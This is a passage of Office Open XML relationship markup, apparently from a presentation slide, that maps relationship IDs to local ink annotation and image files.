Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink661.xml"/><Relationship Id="rId185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink669.xml"/><Relationship Id="rId180" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2710.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image410.png"/><Relationship Id="rId210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image611.png"/><Relationship Id="rId215" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink687.xml"/><Relationship Id="rId236" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1910.png"/><Relationship Id="rId257" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink709.xml"/><Relationship Id="rId231" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink695.xml"/><Relationship Id="rId252" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image881.png"/><Relationship Id="rId273" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image297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4.xml"/><Relationship Id="rId299" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink845.xml"/><Relationship Id="rId303" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink847.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink726.xml"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1430.png"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1712.png"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink775.xml"/><Relationship Id="rId324" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image901.png"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image520.png"/><Relationship Id="rId191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink791.xml"/><Relationship Id="rId205" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink798.xml"/><Relationship Id="rId226" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2140.png"/><Relationship Id="rId247" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2240.png"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink749.xml"/><Relationship Id="rId268" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2940.png"/><Relationship Id="rId289" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink840.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink721.xml"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1380.png"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1660.png"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink770.xml"/><Relationship Id="rId314" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image851.png"/><Relationship Id="rId335" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink863.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink718.xml"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink743.xml"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1820.png"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink786.xml"/><Relationship Id="rId216" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2090.png"/><Relationship Id="rId237" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink814.xml"/><Relationship Id="rId258" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink825.xml"/><Relationship Id="rId279" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink835.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1330.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink737.xml"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1612.png"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink765.xml"/><Relationship Id="rId290" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1310.png"/><Relationship Id="rId304" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2010.png"/><Relationship Id="rId325" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink858.xml"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1770.png"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink781.xml"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1970.png"/><Relationship Id="rId206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2040.png"/><Relationship Id="rId227" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink809.xml"/><Relationship Id="rId248" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink820.xml"/><Relationship Id="rId269" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink830.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1280.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink732.xml"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1560.png"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink760.xml"/><Relationship Id="rId280" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image810.png"/><Relationship Id="rId315" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink853.xml"/><Relationship Id="rId336" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image960.png"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1500.png"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1720.png"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink776.xml"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1920.png"/><Relationship Id="rId217" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink804.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1250.png"/><Relationship Id="rId238" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2200.png"/><Relationship Id="rId259" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2300.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink727.xml"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink755.xml"/><Relationship Id="rId270" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3390.png"/><Relationship Id="rId291" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink841.xml"/><Relationship Id="rId305" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink848.xml"/><Relationship Id="rId326" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image912.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1440.png"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1670.png"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink771.xml"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1870.png"/><Relationship Id="rId193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink792.xml"/><Relationship Id="rId207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink799.xml"/><Relationship Id="rId228" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2150.png"/><Relationship Id="rId249" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2250.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink722.xml"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink750.xml"/><Relationship Id="rId260" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink826.xml"/><Relationship Id="rId281" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink836.xml"/><Relationship Id="rId316" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image861.png"/><Relationship Id="rId337" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink864.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1390.png"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink744.xml"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1620.png"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink766.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink719.xml"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1480.png"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1830.png"/><Relationship Id="rId183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink787.xml"/><Relationship Id="rId213" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink802.xml"/><Relationship Id="rId218" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2100.png"/><Relationship Id="rId234" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2180.png"/><Relationship Id="rId239" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink815.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink717.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink730.xml"/><Relationship Id="rId250" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink821.xml"/><Relationship Id="rId255" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2280.png"/><Relationship Id="rId271" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink831.xml"/><Relationship Id="rId276" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image611.png"/><Relationship Id="rId292" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1410.png"/><Relationship Id="rId297" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink844.xml"/><Relationship Id="rId306" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2110.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1340.png"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1420.png"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink738.xml"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1570.png"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink753.xml"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink761.xml"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1700.png"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink774.xml"/><Relationship Id="rId178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1900.png"/><Relationship Id="rId301" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink846.xml"/><Relationship Id="rId322" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image891.png"/><Relationship Id="rId327" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink859.xml"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1780.png"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink782.xml"/><Relationship Id="rId194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1980.png"/><Relationship Id="rId199" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink795.xml"/><Relationship Id="rId203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink797.xml"/><Relationship Id="rId208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2050.png"/><Relationship Id="rId229" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink810.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink725.xml"/><Relationship Id="rId224" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2130.png"/><Relationship Id="rId240" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink816.xml"/><Relationship Id="rId245" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2230.png"/><Relationship Id="rId261" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2312.png"/><Relationship Id="rId266" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink828.xml"/><Relationship Id="rId287" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink839.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1290.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1370.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink733.xml"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1520.png"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink748.xml"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1650.png"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink769.xml"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1860.png"/><Relationship Id="rId282" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image911.png"/><Relationship Id="rId312" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image841.png"/><Relationship Id="rId317" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink854.xml"/><Relationship Id="rId333" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink862.xml"/><Relationship Id="rId338" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image970.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1260.png"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink742.xml"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1512.png"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink756.xml"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1730.png"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink777.xml"/><Relationship Id="rId184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1930.png"/><Relationship Id="rId189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink790.xml"/><Relationship Id="rId219" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink805.xml"/><Relationship Id="rId214" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2080.png"/><Relationship Id="rId230" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2160.png"/><Relationship Id="rId235" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink813.xml"/><Relationship Id="rId251" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2260.png"/><Relationship Id="rId256" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink824.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1100.png"/><Relationship Id="rId277" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink834.xml"/><Relationship Id="rId298" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1710.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink728.xml"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3490.png"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1600.png"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink764.xml"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1812.png"/><Relationship Id="rId272" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image410.png"/><Relationship Id="rId293" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink842.xml"/><Relationship Id="rId302" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1910.png"/><Relationship Id="rId307" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink849.xml"/><Relationship Id="rId323" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink857.xml"/><Relationship Id="rId328" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image921.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1320.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink736.xml"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink751.xml"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1680.png"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink772.xml"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1880.png"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink785.xml"/><Relationship Id="rId195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink793.xml"/><Relationship Id="rId209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink800.xml"/><Relationship Id="rId190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1960.png"/><Relationship Id="rId204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2030.png"/><Relationship Id="rId220" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2112.png"/><Relationship Id="rId225" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink808.xml"/><Relationship Id="rId241" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2212.png"/><Relationship Id="rId246" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink819.xml"/><Relationship Id="rId267" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink829.xml"/><Relationship Id="rId288" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1210.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink723.xml"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1400.png"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1550.png"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink759.xml"/><Relationship Id="rId262" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink827.xml"/><Relationship Id="rId283" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink837.xml"/><Relationship Id="rId313" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink852.xml"/><Relationship Id="rId318" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image871.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1270.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink731.xml"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1490.png"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink745.xml"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink746.xml"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1630.png"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink767.xml"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1760.png"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1840.png"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink780.xml"/><Relationship Id="rId185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink788.xml"/><Relationship Id="rId334" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image950.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1240.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink720.xml"/><Relationship Id="rId180" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1912.png"/><Relationship Id="rId210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2060.png"/><Relationship Id="rId215" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink803.xml"/><Relationship Id="rId236" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2190.png"/><Relationship Id="rId257" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2290.png"/><Relationship Id="rId278" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image711.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1350.png"/><Relationship Id="rId231" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink811.xml"/><Relationship Id="rId252" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink822.xml"/><Relationship Id="rId273" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink832.xml"/><Relationship Id="rId294" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1510.png"/><Relationship Id="rId308" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2210.png"/><Relationship Id="rId329" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink860.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink739.xml"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1580.png"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink762.xml"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1790.png"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink783.xml"/><Relationship Id="rId196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1990.png"/><Relationship Id="rId200" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2012.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1300.png"/><Relationship Id="rId221" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink806.xml"/><Relationship Id="rId242" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink817.xml"/><Relationship Id="rId263" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2320.png"/><Relationship Id="rId284" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1010.png"/><Relationship Id="rId319" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink855.xml"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink734.xml"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1530.png"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink757.xml"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1740.png"/><Relationship Id="rId330" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image930.png"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1470.png"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink778.xml"/><Relationship Id="rId186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1940.png"/><Relationship Id="rId211" 